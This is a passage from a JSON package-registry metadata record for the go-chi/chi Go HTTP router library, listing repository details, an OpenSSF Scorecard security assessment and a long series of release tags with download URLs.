ynced_at":"2026-08-12T02:06:23.818Z","created_at":"2024-05-04T04:45:38.217Z","updated_at":"2026-08-12T02:06:23.819Z","registry_url":"https://pkg.go.dev/github.com/GO-CHI/chi","install_command":"go get github.com/GO-CHI/chi","documentation_url":"https://pkg.go.dev/github.com/GO-CHI/chi#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repo